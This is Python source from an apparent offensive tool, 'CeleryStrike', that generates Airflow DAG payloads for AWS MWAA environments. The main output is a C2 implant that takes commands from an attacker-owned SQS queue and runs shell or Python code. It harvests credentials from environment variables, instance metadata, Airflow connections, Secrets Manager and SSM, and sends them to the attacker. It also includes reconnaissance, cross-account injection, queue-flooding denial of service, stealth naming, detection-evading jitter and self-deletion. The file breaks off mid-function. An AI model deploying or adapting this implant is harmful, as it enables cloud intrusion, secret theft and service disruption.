"""
DAG Payload Generator

Generates Airflow DAG files that implement the various attack vectors
for deployment to a target MWAA environment via S3.

Each generated DAG is a standalone Python file that can be uploaded to
the MWAA DAGs S3 bucket.
"""

import json
import os
import textwrap
from typing import Optional

from ..config import (
    AttackerConfig,
    TargetConfig,
    DEFAULT_C2_CMD_QUEUE,
    DEFAULT_C2_RESULTS_QUEUE,
)
from ..utils import (
    get_s3_client,
    print_section,
    print_success,
    print_fail,
    print_info,
    print_warn,
    print_result,
    logger,
)


def generate_c2_implant_dag(
    attacker: AttackerConfig,
    cmd_queue: str = DEFAULT_C2_CMD_QUEUE,
    results_queue: str = DEFAULT_C2_RESULTS_QUEUE,
    dag_id: str = "c2_implant_sqs",
    poll_interval_minutes: int = 5,
    jitter_seconds: int = 0,
    stealth: bool = False,
    output_path: Optional[str] = None,
) -> str:
    """Generate the C2 implant DAG with full post-exploitation capabilities.

    Args:
        attacker: Attacker account configuration.
        cmd_queue: SQS queue name for inbound commands.
        results_queue: SQS queue name for outbound results.
        dag_id: Airflow DAG identifier. Overridden in stealth mode.
        poll_interval_minutes: Base polling interval.
        jitter_seconds: Max random jitter added to poll interval (0=disabled).
        stealth: Use innocuous DAG name/tags to blend with normal workloads.
        output_path: File path to write the generated DAG.
    """
    if stealth:
        dag_id = "etl_celery_task_monitor"
        dag_tags_str = '["etl", "monitoring"]'
        dag_docstring = "ETL Celery task health monitor"
    else:
        dag_tags_str = '["security", "c2"]'
        dag_docstring = (
            "MWAA SQS C2 Implant DAG\\n"
            "Generated by CeleryStrike\\n"
            "For authorized security testing only."
        )

    code = textwrap.dedent(f'''\
        """
        {dag_docstring}
        """
        import base64
        import io
        import json
        import os
        import platform
        import random
        import socket
        import subprocess
        import sys
        import time
        import traceback
        from contextlib import redirect_stdout, redirect_stderr
        from datetime import datetime, timedelta

        import boto3
        from airflow.models.dag import DAG
        from airflow.operators.python import PythonOperator

        # ── Configuration (embedded at generation time) ──────────────────
        ATTACKER_AWS_ACCOUNT_ID = "{attacker.account_id}"
        ATTACKER_REGION = "{attacker.region}"
        COMMAND_QUEUE_NAME = "{cmd_queue}"
        RESULTS_QUEUE_NAME = "{results_queue}"
        JITTER_SECONDS = {jitter_seconds}
        SQS_MAX_BODY = 250000  # leave headroom under 256KB limit

        # ── Helpers ──────────────────────────────────────────────────────

        def _queue_url(queue_name):
            return (
                f"https://sqs.{{ATTACKER_REGION}}.amazonaws.com/"
                f"{{ATTACKER_AWS_ACCOUNT_ID}}/{{queue_name}}"
            )

        def _send_result(sqs, results_url, result_dict):
            """Send a result dict, chunking if it exceeds SQS limits."""
            body = json.dumps(result_dict, default=str)
            if len(body.encode("utf-8")) <= SQS_MAX_BODY:
                sqs.send_message(QueueUrl=results_url, MessageBody=body)
                return

            # Chunk the stdout/stderr that caused the overflow
            chunk_id = result_dict.get("timestamp", datetime.utcnow().isoformat())
            raw_stdout = base64.b64decode(result_dict.get("stdout", "")).decode(
                "utf-8", errors="replace"
            )
            raw_stderr = base64.b64decode(result_dict.get("stderr", "")).decode(
                "utf-8", errors="replace"
            )
            combined = raw_stdout + raw_stderr
            total_chunks = (len(combined) // SQS_MAX_BODY) + 1
            for idx in range(total_chunks):
                chunk_data = combined[idx * SQS_MAX_BODY : (idx + 1) * SQS_MAX_BODY]
                chunk_msg = {{
                    "command": result_dict.get("command", ""),
                    "return_code": result_dict.get("return_code", 0),
                    "stdout": base64.b64encode(chunk_data.encode()).decode(),
                    "stderr": "",
                    "hostname": result_dict.get("hostname", ""),
                    "timestamp": result_dict.get("timestamp", ""),
                    "chunk_index": idx,
                    "total_chunks": total_chunks,
                    "chunk_id": chunk_id,
                }}
                sqs.send_message(
                    QueueUrl=results_url,
                    MessageBody=json.dumps(chunk_msg, default=str),
                )

        def _fingerprint():
            """Collect system fingerprint for beacons."""
            info = {{
                "hostname": socket.gethostname(),
                "fqdn": socket.getfqdn(),
                "platform": platform.platform(),
                "python": sys.version,
                "pid": os.getpid(),
                "uid": os.getuid(),
                "cwd": os.getcwd(),
            }}
            try:
                info["user"] = os.getlogin()
            except Exception:
                import pwd
                try:
                    info["user"] = pwd.getpwuid(os.getuid()).pw_name
                except Exception:
                    info["user"] = str(os.getuid())
            return info

        # ── Built-in post-exploitation modules ───────────────────────────

        def _builtin_harvest_creds():
            """Harvest all available AWS credentials and identity info."""
            results = {{}}

            # STS caller identity
            try:
                sts = boto3.client("sts")
                results["caller_identity"] = sts.get_caller_identity()
            except Exception as e:
                results["caller_identity_error"] = str(e)

            # Environment variables with sensitive patterns
            sensitive = {{}}
            patterns = [
                "AWS", "AIRFLOW", "MWAA", "SECRET", "KEY", "TOKEN",
                "DB", "PASS", "CRED", "AUTH", "API", "CONN", "DSN",
                "PRIVATE", "CERT", "FERNET",
            ]
            for k, v in os.environ.items():
                if any(p in k.upper() for p in patterns):
                    sensitive[k] = v
            results["env_credentials"] = sensitive

            # EC2 instance metadata (IMDSv1 + v2)
            import urllib.request
            for label, url in [
                ("iam_role", "http://169.254.169.254/latest/meta-data/iam/security-credentials/"),
                ("instance_id", "http://169.254.169.254/latest/meta-data/instance-id"),
                ("account_from_identity", "http://169.254.169.254/latest/dynamic/instance-identity/document"),
            ]:
                try:
                    # Try IMDSv2 first
                    token_req = urllib.request.Request(
                        "http://169.254.169.254/latest/api/token",
                        headers={{"X-aws-ec2-metadata-token-ttl-seconds": "60"}},
                        method="PUT",
                    )
                    token = urllib.request.urlopen(token_req, timeout=2).read().decode()
                    req = urllib.request.Request(url, headers={{"X-aws-ec2-metadata-token": token}})
                    data = urllib.request.urlopen(req, timeout=2).read().decode()
                except Exception:
                    try:
                        data = urllib.request.urlopen(url, timeout=2).read().decode()
                    except Exception as e:
                        data = f"unavailable: {{e}}"
                results[f"imds_{{label}}"] = data

            # If we got a role name from IMDS, fetch its credentials
            role_name = results.get("imds_iam_role", "")
            if role_name and "unavailable" not in role_name:
                role_name = role_name.strip().split("\\n")[0]
                cred_url = f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{{role_name}}"
                try:
                    token_req = urllib.request.Request(
                        "http://169.254.169.254/latest/api/token",
                        headers={{"X-aws-ec2-metadata-token-ttl-seconds": "60"}},
                        method="PUT",
                    )
                    token = urllib.request.urlopen(token_req, timeout=2).read().decode()
                    req = urllib.request.Request(cred_url, headers={{"X-aws-ec2-metadata-token": token}})
                    results["imds_role_credentials"] = urllib.request.urlopen(req, timeout=2).read().decode()
                except Exception:
                    try:
                        results["imds_role_credentials"] = urllib.request.urlopen(cred_url, timeout=2).read().decode()
                    except Exception as e:
                        results["imds_role_credentials"] = f"unavailable: {{e}}"

            # Container credential URI (ECS/Fargate)
            rel_uri = os.environ.get("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI", "")
            if rel_uri:
                try:
                    container_url = f"http://169.254.170.2{{rel_uri}}"
                    results["container_credentials"] = urllib.request.urlopen(
                        container_url, timeout=2
                    ).read().decode()
                except Exception as e:
                    results["container_credentials"] = f"unavailable: {{e}}"

            return json.dumps(results, indent=2, default=str)

        def _builtin_airflow_dump():
            """Dump Airflow connections, variables, and pools."""
            results = {{"connections": [], "variables": [], "pools": []}}

            try:
                from airflow.models import Connection, Variable
                from airflow.models.pool import Pool
                from airflow.utils.session import create_session

                with create_session() as session:
                    # Connections with full credential details
                    for conn in session.query(Connection).all():
                        entry = {{
                            "conn_id": conn.conn_id,
                            "conn_type": conn.conn_type,
                            "host": conn.host,
                            "port": conn.port,
                            "login": conn.login,
                            "schema": conn.schema,
                        }}
                        try:
                            entry["password"] = conn.get_password()
                        except Exception:
                            entry["password"] = None
                        try:
                            entry["extra"] = conn.get_extra()
                        except Exception:
                            entry["extra"] = None
                        try:
                            entry["uri"] = conn.get_uri()
                        except Exception:
                            entry["uri"] = None
                        results["connections"].append(entry)

                    # Variables (may contain secrets)
                    for var in session.query(Variable).all():
                        results["variables"].append({{
                            "key": var.key,
                            "val": var.val,
                            "is_encrypted": var.is_encrypted,
                        }})

                    # Pools
                    for pool in session.query(Pool).all():
                        results["pools"].append({{
                            "pool": pool.pool,
                            "slots": pool.slots,
                            "description": pool.description,
                        }})

            except Exception as e:
                results["error"] = str(e)
                results["traceback"] = traceback.format_exc()

            return json.dumps(results, indent=2, default=str)

        def _builtin_s3_recon():
            """Enumerate S3 buckets and sample objects from each."""
            results = {{"buckets": []}}
            s3 = boto3.client("s3")

            try:
                buckets = s3.list_buckets().get("Buckets", [])
                for b in buckets:
                    bucket_info = {{"name": b["Name"], "created": str(b.get("CreationDate", ""))}}
                    # Sample first 10 objects
                    try:
                        objs = s3.list_objects_v2(Bucket=b["Name"], MaxKeys=10)
                        bucket_info["sample_objects"] = [
                            {{"key": o["Key"], "size": o["Size"], "modified": str(o["LastModified"])}}
                            for o in objs.get("Contents", [])
                        ]
                        bucket_info["total_keys_hint"] = objs.get("KeyCount", 0)
                    except Exception as e:
                        bucket_info["list_error"] = str(e)

                    # Check bucket policy
                    try:
                        policy = s3.get_bucket_policy(Bucket=b["Name"])
                        bucket_info["policy"] = policy.get("Policy", "")
                    except Exception:
                        bucket_info["policy"] = "none/access-denied"

                    results["buckets"].append(bucket_info)
            except Exception as e:
                results["error"] = str(e)

            return json.dumps(results, indent=2, default=str)

        def _builtin_secrets_manager():
            """Enumerate and retrieve Secrets Manager secrets."""
            results = {{"secrets": []}}
            sm = boto3.client("secretsmanager")

            try:
                paginator = sm.get_paginator("list_secrets")
                for page in paginator.paginate():
                    for secret in page.get("SecretList", []):
                        entry = {{
                            "Name": secret["Name"],
                            "ARN": secret.get("ARN", ""),
                            "Description": secret.get("Description", ""),
                            "LastChangedDate": str(secret.get("LastChangedDate", "")),
                        }}
                        # Attempt to read the value
                        try:
                            val = sm.get_secret_value(SecretId=secret["ARN"])
                            entry["SecretString"] = val.get("SecretString", "")
                            if val.get("SecretBinary"):
                                entry["SecretBinary_b64"] = base64.b64encode(
                                    val["SecretBinary"]
                                ).decode()
                        except Exception as e:
                            entry["get_value_error"] = str(e)
                        results["secrets"].append(entry)
            except Exception as e:
                results["error"] = str(e)

            return json.dumps(results, indent=2, default=str)

        def _builtin_ssm_params():
            """Enumerate and read SSM Parameter Store parameters."""
            results = {{"parameters": []}}
            ssm = boto3.client("ssm")

            try:
                paginator = ssm.get_paginator("describe_parameters")
                for page in paginator.paginate():
                    for param in page.get("Parameters", []):
                        entry = {{
                            "Name": param["Name"],
                            "Type": param.get("Type", ""),
                            "Description": param.get("Description", ""),
                            "LastModifiedDate": str(param.get("LastModifiedDate", "")),
                        }}
                        # Read the value (with decryption for SecureString)
                        try:
                            val = ssm.get_parameter(
                                Name=param["Name"], WithDecryption=True
                            )
                            entry["Value"] = val["Parameter"].get("Value", "")
                        except Exception as e:
                            entry["get_value_error"] = str(e)
                        results["parameters"].append(entry)
            except Exception as e:
                results["error"] = str(e)

            return json.dumps(results, indent=2, default=str)

        def _builtin_iam_enum():
            """Enumerate IAM context: attached policies, role info, permissions boundary."""
            results = {{}}
            iam = boto3.client("iam")
            sts = boto3.client("sts")

            try:
                identity = sts.get_caller_identity()
                results["identity"] = identity
                arn = identity.get("Arn", "")

                # Extract role name from ARN
                if ":assumed-role/" in arn:
                    role_name = arn.split(":assumed-role/")[1].split("/")[0]
                    results["assumed_role"] = role_name

                    try:
                        role = iam.get_role(RoleName=role_name)
                        results["role_details"] = role["Role"]
                    except Exception as e:
                        results["role_details_error"] = str(e)

                    # Attached policies
                    try:
                        attached = iam.list_attached_role_policies(RoleName=role_name)
                        results["attached_policies"] = attached.get("AttachedPolicies", [])
                    except Exception as e:
                        results["attached_policies_error"] = str(e)

                    # Inline policies
                    try:
                        inline = iam.list_role_policies(RoleName=role_name)
                        policy_docs = {{}}
                        for pname in inline.get("PolicyNames", []):
                            try:
                                doc = iam.get_role_policy(
                                    RoleName=role_name, PolicyName=pname
                                )
                                policy_docs[pname] = doc.get("PolicyDocument", {{}})
                            except Exception:
                                pass
                        results["inline_policies"] = policy_docs
                    except Exception as e:
                        results["inline_policies_error"] = str(e)
            except Exception as e:
                results["error"] = str(e)

            return json.dumps(results, indent=2, default=str)

        def _builtin_network_recon():
            """Network and infrastructure reconnaissance from within the worker."""
            results = {{}}
            import urllib.request

            # Basic network info
            results["hostname"] = socket.gethostname()
            results["fqdn"] = socket.getfqdn()
            try:
                results["local_ips"] = socket.gethostbyname_ex(socket.gethostname())[2]
            except Exception:
                results["local_ips"] = []

            # Interfaces via /proc
            try:
                with open("/proc/net/if_inet6") as f:
                    results["ipv6_interfaces"] = f.read()
            except Exception:
                pass
            try:
                with open("/proc/net/route") as f:
                    results["routes"] = f.read()
            except Exception:
                pass
            try:
                with open("/proc/net/tcp") as f:
                    results["tcp_connections"] = f.read()
            except Exception:
                pass
            try:
                with open("/etc/resolv.conf") as f:
                    results["dns_config"] = f.read()
            except Exception:
                pass
            try:
                with open("/etc/hosts") as f:
                    results["hosts_file"] = f.read()
            except Exception:
                pass

            # EC2 metadata - VPC / subnet / security groups
            metadata_paths = [
                "network/interfaces/macs/",
                "placement/availability-zone",
                "placement/region",
                "services/domain",
            ]
            for path in metadata_paths:
                url = f"http://169.254.169.254/latest/meta-data/{{path}}"
                try:
                    token_req = urllib.request.Request(
                        "http://169.254.169.254/latest/api/token",
                        headers={{"X-aws-ec2-metadata-token-ttl-seconds": "60"}},
                        method="PUT",
                    )
                    token = urllib.request.urlopen(token_req, timeout=2).read().decode()
                    req = urllib.request.Request(url, headers={{"X-aws-ec2-metadata-token": token}})
                    results[f"imds_{{path.rstrip('/')}}"] = urllib.request.urlopen(
                        req, timeout=2
                    ).read().decode()
                except Exception:
                    try:
                        results[f"imds_{{path.rstrip('/')}}"] = urllib.request.urlopen(
                            url, timeout=2
                        ).read().decode()
                    except Exception:
                        pass

            # Describe VPCs / subnets / security groups via EC2 API
            ec2 = boto3.client("ec2")
            try:
                vpcs = ec2.describe_vpcs()
                results["vpcs"] = vpcs.get("Vpcs", [])
            except Exception as e:
                results["vpcs_error"] = str(e)
            try:
                subnets = ec2.describe_subnets()
                results["subnets"] = subnets.get("Subnets", [])
            except Exception as e:
                results["subnets_error"] = str(e)
            try:
                sgs = ec2.describe_security_groups()
                results["security_groups"] = sgs.get("SecurityGroups", [])
            except Exception as e:
                results["security_groups_error"] = str(e)

            return json.dumps(results, indent=2, default=str)

        def _builtin_file_read(path):
            """Read a file and return its contents (base64 for binary)."""
            try:
                with open(path, "r") as f:
                    return f.read()
            except UnicodeDecodeError:
                with open(path, "rb") as f:
                    return base64.b64encode(f.read()).decode()
            except Exception as e:
                return f"Error reading {{path}}: {{e}}"

        def _builtin_file_write(path, content_b64):
            """Write base64-decoded content to a file."""
            try:
                raw = base64.b64decode(content_b64)
                with open(path, "wb") as f:
                    f.write(raw)
                return f"Written {{len(raw)}} bytes to {{path}}"
            except Exception as e:
                return f"Error writing {{path}}: {{e}}"

        def _builtin_self_destruct(dag_file=None):
            """Remove this DAG file and any cached .pyc files."""
            removed = []
            if dag_file is None:
                dag_file = os.path.abspath(__file__)
            try:
                os.remove(dag_file)
                removed.append(dag_file)
            except Exception as e:
                removed.append(f"failed: {{dag_file}}: {{e}}")
            # Clean __pycache__
            cache_dir = os.path.join(os.path.dirname(dag_file), "__pycache__")
            if os.path.isdir(cache_dir):
                basename = os.path.splitext(os.path.basename(dag_file))[0]
                for fn in os.listdir(cache_dir):
                    if fn.startswith(basename):
                        fp = os.path.join(cache_dir, fn)
                        try:
                            os.remove(fp)
                            removed.append(fp)
                        except Exception:
                            pass
            return "Removed: " + ", ".join(removed)

        def _builtin_recon(accounts_csv, region=None):
            """Scan comma-separated account IDs for airflow-celery-* queues.
            Optional region parameter; defaults to the implant's own region.
            """
            sqs = boto3.client("sqs", **({{"region_name": region}} if region else {{}}))
            suffixes = [
                "prod", "production", "dev", "development", "staging",
                "stage", "test", "default", "main", "primary",
            ]
            accounts = [a.strip() for a in accounts_csv.split(",") if a.strip()]
            discovered = []
            for acct in accounts:
                for suffix in suffixes:
                    queue_name = f"airflow-celery-{{suffix}}"
                    try:
                        resp = sqs.get_queue_url(
                            QueueName=queue_name,
                            QueueOwnerAWSAccountNumber=acct,
                        )
                        discovered.append({{
                            "account_id": acct,
                            "queue_name": queue_name,
                            "queue_url": resp["QueueUrl"],
                        }})
                    except Exception:
                        pass
            return json.dumps({{
                "scan_type": "recon",
                "discovered": discovered,
                "accounts_scanned": len(accounts),
                "region": region or "default",
            }}, indent=2, default=str)

        def _builtin_inject(args_str):
            """Inject a JSON payload into a target queue.
            Usage: !inject <account_id> <queue_name> <json_payload> [region]
            """
            parts = args_str.strip().split(" ", 3)
            if len(parts) < 3:
                return "Usage: !inject <account_id> <queue_name> <json_payload> [region]"
            acct = parts[0]
            queue_name = parts[1]
            # Last token might be a region if there are 4+ parts
            if len(parts) == 4:
                payload_json = parts[2]
                region = parts[3]
            else:
                payload_json = parts[2]
                region = None
            sqs = boto3.client("sqs", **({{"region_name": region}} if region else {{}}))
            actual_region = sqs.meta.region_name
            queue_url = f"https://sqs.{{actual_region}}.amazonaws.com/{{acct}}/{{queue_name}}"
            try:
                sqs.send_message(QueueUrl=queue_url, MessageBody=payload_json)
                return f"Injected payload into {{queue_url}}"
            except Exception as e:
                return f"Injection failed: {{e}}"

        def _builtin_dos_flood(args_str):
            """Flood a target queue with messages.
            Usage: !dos-flood <account_id> <queue_name> [count] [region]
            """
            parts = args_str.strip().split()
            if len(parts) < 2:
                return "Usage: !dos-flood <account_id> <queue_name> [count] [region]"
            acct = parts[0]
            queue_name = parts[1]
            try:
                count = min(int(parts[2]), 1000) if len(parts) >= 3 else 100
            except ValueError:
                return "Invalid count. Usage: !dos-flood <account_id> <queue_name> [count] [region]"
            region = parts[3] if len(parts) >= 4 else None
            sqs = boto3.client("sqs", **({{"region_name": region}} if region else {{}}))
            actual_region = sqs.meta.region_name
            queue_url = f"https://sqs.{{actual_region}}.amazonaws.com/{{acct}}/{{queue_name}}"
            sent = 0
            for i in range(count):
                try:
                    sqs.send_message(
                        QueueUrl=queue_url,
                        MessageBody=json.dumps({{
                            "type": "dos_test",
                            "seq": i,
                            "padding": "X" * 2048,
                        }}),
                    )
                    sent += 1
                except Exception as e:
                    return f"Sent {{sent}}/{{count}} messages (error at {{i}}: {{e}})"
            return f"Sent {{sent}}/{{count}} messages to {{queue_url}}"

        # Dispatch table for built-in modules
        BUILTINS = {{
            "!harvest-creds": _builtin_harvest_creds,
            "!airflow-dump":  _builtin_airflow_dump,
            "!s3-recon":      _builtin_s3_recon,
            "!secrets":       _builtin_secrets_manager,
            "!ssm-params":    _builtin_ssm_params,
            "!iam-enum":      _builtin_iam_enum,
            "!network-recon": _builtin_network_recon,
            "!self-destruct": _builtin_self_destruct,
        }}

        # ── Main implant logic ───────────────────────────────────────────

        def _execute_command(command):
            """Execute a single command and return (stdout, stderr, rc)."""

            # 1. Built-in modules
            if command.strip() in BUILTINS:
                try:
                    output = BUILTINS[command.strip()]()
                    return (output if isinstance(output, str) else json.dumps(output, default=str)), "", 0
                except Exception as e:
                    return "", traceback.format_exc(), 1

            # 2. File read: !read-file <path>
            if command.strip().startswith("!read-file "):
                path = command.strip()[len("!read-file "):].strip()
                return _builtin_file_read(path), "", 0

            # 3. File write: !write-file <path> <base64content>
            if command.strip().startswith("!write-file "):
                parts = command.strip()[len("!write-file "):].strip().split(" ", 1)
                if len(parts) == 2:
                    return _builtin_file_write(parts[0], parts[1]), "", 0
                return "", "Usage: !write-file <path> <base64content>", 1

            # 4. Pivot: !pivot <account_id> <queue_name> <message>
            if command.strip().startswith("!pivot "):
                parts = command.strip()[len("!pivot "):].strip().split(" ", 2)
                if len(parts) == 3:
                    try:
                        pivot_acct, pivot_queue, pivot_msg = parts
                        pivot_url = f"https://sqs.{{ATTACKER_REGION}}.amazonaws.com/{{pivot_acct}}/{{pivot_queue}}"
                        sqs_client = boto3.client("sqs", region_name=ATTACKER_REGION)
                        sqs_client.send_message(QueueUrl=pivot_url, MessageBody=pivot_msg)
                        return f"Pivoted message to {{pivot_url}}", "", 0
                    except Exception as e:
                        return "", str(e), 1
                return "", "Usage: !pivot <account_id> <queue_name> <message>", 1

            # 5. Recon: !recon <acct1,acct2,...> [region]
            if command.strip().startswith("!recon "):
                args = command.strip()[len("!recon "):].strip()
                try:
                    # Last space-separated token may be a region
                    tokens = args.rsplit(None, 1)
                    if len(tokens) == 2 and "-" in tokens[1] and "," not in tokens[1]:
                        return _builtin_recon(tokens[0], region=tokens[1]), "", 0
                    return _builtin_recon(args), "", 0
                except Exception as e:
                    return "", traceback.format_exc(), 1

            # 6. Inject: !inject <account_id> <queue_name> <json_payload>
            if command.strip().startswith("!inject "):
                args = command.strip()[len("!inject "):].strip()
                try:
                    return _builtin_inject(args), "", 0
                except Exception as e:
                    return "", traceback.format_exc(), 1

            # 7. DoS flood: !dos-flood <account_id> <queue_name> [count]
            if command.strip().startswith("!dos-flood "):
                args = command.strip()[len("!dos-flood "):].strip()
                try:
                    return _builtin_dos_flood(args), "", 0
                except Exception as e:
                    return "", traceback.format_exc(), 1

            # 8. Multi-command: !multi\\ncommand1\\ncommand2\\n...
            if command.strip().startswith("!multi\\n") or command.strip().startswith("!multi\\r\\n"):
                lines = command.strip().split("\\n")[1:]
                all_stdout, all_stderr = [], []
                final_rc = 0
                for line in lines:
                    line = line.strip()
                    if not line:
                        continue
                    so, se, rc = _execute_command(line)
                    all_stdout.append(f"[{{line}}] rc={{rc}}\\n{{so}}")
                    if se:
                        all_stderr.append(f"[{{line}}]\\n{{se}}")
                    if rc != 0:
                        final_rc = rc
                return "\\n".join(all_stdout), "\\n".join(all_stderr), final_rc

            # 9. Python execution with stdout/stderr capture
            if command.strip().startswith("python:"):
                try:
                    py_code = command.strip()[7:]
                    out_buf = io.StringIO()
                    err_buf = io.StringIO()
                    exec_globals = {{
                        "boto3": boto3, "os": os, "json": json,
                        "base64": base64, "subprocess": subprocess,
                        "__builtins__": __builtins__,
                    }}
                    with redirect_stdout(out_buf), redirect_stderr(err_buf):
                        exec(py_code, exec_globals)
                    stdout = out_buf.getvalue()
                    # Also check for __result__ for non-print return values
                    if "__result__" in exec_globals:
                        r = exec_globals["__result__"]
                        stdout += (r if isinstance(r, str) else json.dumps(r, default=str))
                    return stdout, err_buf.getvalue(), 0
                except Exception as e:
                    return "", traceback.format_exc(), 1

            # 10. Shell execution (default)
            try:
                proc = subprocess.run(
                    command, shell=True,
                    capture_output=True, text=True, timeout=300,
                )
                return proc.stdout, proc.stderr, proc.returncode
            except subprocess.TimeoutExpired:
                return "", "Command timed out after 300s", -1
            except Exception as e:
                return "", str(e), -1


        def c2_implant():
            """Main C2 loop: beacon, poll all commands, execute, return results."""
            sqs = boto3.client("sqs", region_name=ATTACKER_REGION)
            cmd_url = _queue_url(COMMAND_QUEUE_NAME)
            results_url = _queue_url(RESULTS_QUEUE_NAME)

            # Apply jitter to avoid fixed-interval detection
            if JITTER_SECONDS > 0:
                jitter = random.uniform(0, JITTER_SECONDS)
                time.sleep(jitter)

            # Send heartbeat beacon
            beacon = {{
                "type": "beacon",
                "fingerprint": _fingerprint(),
                "timestamp": datetime.utcnow().isoformat(),
                "builtins": list(BUILTINS.keys()) + [
                    "!read-file <path>",
                    "!write-file <path> <b64>",
                    "!pivot <acct> <queue> <msg>",
                    "!recon <acct1,acct2,...> [region]",
                    "!inject <acct> <queue> <json> [region]",
                    "!dos-flood <acct> <queue> [n] [region]",
                    "!multi",
                    "python:<code>",
                ],
            }}
            _send_result(sqs, results_url, beacon)

            # Poll for ALL pending commands (batch of 10 per API call, loop)
            all_messages = []
            while True:
                response = sqs.receive_message(
                    QueueUrl=cmd_url,
                    MaxNumberOfMessages=10,
                    WaitTimeSeconds=5,
                )
                batch = response.get("Messages", [])
                if not batch:
                    break
                all_messages.extend(batch)
                if len(batch) < 10:
                    break

            if not all_messages:
                print("No commands pending.")
                return

            print(f"Processing {{len(all_messages)}} command(s).")

            for message in all_messages:
                receipt = message["ReceiptHandle"]
                command = message["Body"]
                print(f"Executing: {{command[:100]}}")

                stdout, stderr, rc = _execute_command(command)
                if not isinstance(stdout, str):
                    stdout = json.dumps(stdout, default=str)
                if not isinstance(stderr, str):
                    stderr = str(stderr)

                result = {{
                    "type": "result",
                    "command": command,
                    "return_code": rc,
                    "stdout": base64.b64encode(stdout.encode()).decode(),
                    "stderr": base64.b64encode(stderr.encode()).decode(),
                    "hostname": os.uname().nodename,
                    "timestamp": datetime.utcnow().isoformat(),
                }}

                _send_result(sqs, results_url, result)
                sqs.delete_message(QueueUrl=cmd_url, ReceiptHandle=receipt)

            print(f"Processed {{len(all_messages)}} command(s). Results sent.")


        with DAG(
            dag_id="{dag_id}",
            start_date=datetime(2023, 1, 1),
            schedule_interval=timedelta(minutes={poll_interval_minutes}),
            catchup=False,
            tags={dag_tags_str},
            max_active_runs=1,
        ) as dag:
            PythonOperator(
                task_id="c2_implant",
                python_callable=c2_implant,
            )
    ''')

    if output_path:
        with open(output_path, "w") as f:
            f.write(code)
        print_success(f"C2 implant DAG written to: {output_path}")
        print_info(f"  Stealth mode: {'ON' if stealth else 'OFF'}")
        print_info(f"  Poll interval: {poll_interval_minutes}m + {jitter_seconds}s jitter")
        print_info(f"  Built-in modules: !harvest-creds, !airflow-dump, !s3-recon, "
                   f"!secrets, !ssm-params, !iam-enum, !network-recon, !self-destruct")
        print_info(f"  Remote attacks: !recon <accts> [region], !inject <acct> <queue> <json> [region], "
                   f"!dos-flood <acct> <queue> [n] [region]")
        print_info(f"  File ops: !read-file <path>, !write-file <path> <b64>")
        print_info(f"  Pivot: !pivot <account_id> <queue_name> <message>")
        print_info(f"  Multi-cmd: !multi\\ncmd1\\ncmd2")

    return code


def generate_recon_dag(
    attacker: AttackerConfig,
    target_account_ids: list,
    results_queue: str = "airflow-celery-recon-results",
    dag_id: str = "recon_sqs_scanner",
    output_path: Optional[str] = None,
) -> str:
    """Generate a DAG that performs SQS queue reconnaissance from within MWAA."""
    accounts_json = json.dumps(target_account_ids)
    code = textwrap.dedent(f'''\
        """
        MWAA SQS Infrastructure Reconnaissance DAG
        Generated by CeleryStrike
        For authorized security testing only.
        """
        import json
        from datetime import datetime

        import boto3
        from airflow.models.dag import DAG
        from airflow.operators.python import PythonOperator

        ATTACKER_AWS_ACCOUNT_ID = "{attacker.account_id}"
        ATTACKER_REGION = "{attacker.region}"
        RESULTS_QUEUE_NAME = "{results_queue}"
        TARGET_ACCOUNTS = {accounts_json}

        QUEUE_SUFFIXES = [
            "prod", "production", "dev", "development", "staging",
            "stage", "test", "default", "main", "primary",
        ]


        def scan_queues():
            """Scan target accounts for airflow-celery-* queues."""
            sqs = boto3.client("sqs", region_name=ATTACKER_REGION)
            results_url = f"https://sqs.{{ATTACKER_REGION}}.amazonaws.com/{{ATTACKER_AWS_ACCOUNT_ID}}/{{RESULTS_QUEUE_NAME}}"

            discovered = []
            for acct in TARGET_ACCOUNTS:
                for suffix in QUEUE_SUFFIXES:
                    queue_name = f"airflow-celery-{{suffix}}"
                    try:
                        resp = sqs.get_queue_url(
                            QueueName=queue_name,
                            QueueOwnerAWSAccountNumber=acct,
                        )
                        discovered.append({{
                            "account_id": acct,
                            "queue_name": queue_name,
                            "queue_url": resp["QueueUrl"],
                        }})
                        print(f"FOUND: {{acct}}/{{queue_name}}")
                    except Exception:
                        pass

            sqs.send_message(
                QueueUrl=results_url,
                MessageBody=json.dumps({{
                    "scan_type": "recon",
                    "discovered": discovered,
                    "accounts_scanned": len(TARGET_ACCOUNTS),
                    "timestamp": datetime.utcnow().isoformat(),
                }}),
            )
            print(f"Recon complete. {{len(discovered)}} queues found.")


        with DAG(
            dag_id="{dag_id}",
            start_date=datetime(2023, 1, 1),
            schedule_interval=None,
            catchup=False,
            tags=["security", "recon"],
        ) as dag:
            PythonOperator(
                task_id="scan_queues",
                python_callable=scan_queues,
            )
    ''')

    if output_path:
        with open(output_path, "w") as f:
            f.write(code)
        print_success(f"DAG written to: {output_path}")

    return code


def generate_dos_dag(
    target_account_id: str,
    target_queue_name: str,
    target_region: str = "us-east-1",
    message_count: int = 1000,
    dag_id: str = "dos_sqs_flood",
    output_path: Optional[str] = None,
) -> str:
    """Generate a DAG that floods a target queue with messages."""
    code = textwrap.dedent(f'''\
        """
        MWAA SQS DoS Simulation DAG
        Generated by CeleryStrike
        For authorized security testing only.
        """
        import json
        from datetime import datetime

        import boto3
        from airflow.models.dag import DAG
        from airflow.operators.python import PythonOperator

        TARGET_ACCOUNT_ID = "{target_account_id}"
        TARGET_QUEUE_NAME = "{target_queue_name}"
        TARGET_REGION = "{target_region}"
        MESSAGE_COUNT = {message_count}


        def flood_queue():
            """Send a batch of messages to the target queue."""
            sqs = boto3.client("sqs", region_name=TARGET_REGION)
            queue_url = f"https://sqs.{{TARGET_REGION}}.amazonaws.com/{{TARGET_ACCOUNT_ID}}/{{TARGET_QUEUE_NAME}}"

            sent = 0
            for i in range(MESSAGE_COUNT):
                try:
                    sqs.send_message(
                        QueueUrl=queue_url,
                        MessageBody=json.dumps({{
                            "type": "dos_test",
                            "seq": i,
                            "padding": "X" * 2048,
                        }}),
                    )
                    sent += 1
                except Exception as e:
                    print(f"Error at message {{i}}: {{e}}")
                    break

            print(f"Sent {{sent}}/{{MESSAGE_COUNT}} messages to {{queue_url}}")


        with DAG(
            dag_id="{dag_id}",
            start_date=datetime(2023, 1, 1),
            schedule_interval=None,
            catchup=False,
            tags=["security", "dos"],
        ) as dag:
            PythonOperator(
                task_id="flood_queue",
                python_callable=flood_queue,
            )
    ''')

    if output_path:
        with open(output_path, "w") as f:
            f.write(code)
        print_success(f"DAG written to: {output_path}")

    return code


def upload_dag_to_s3(
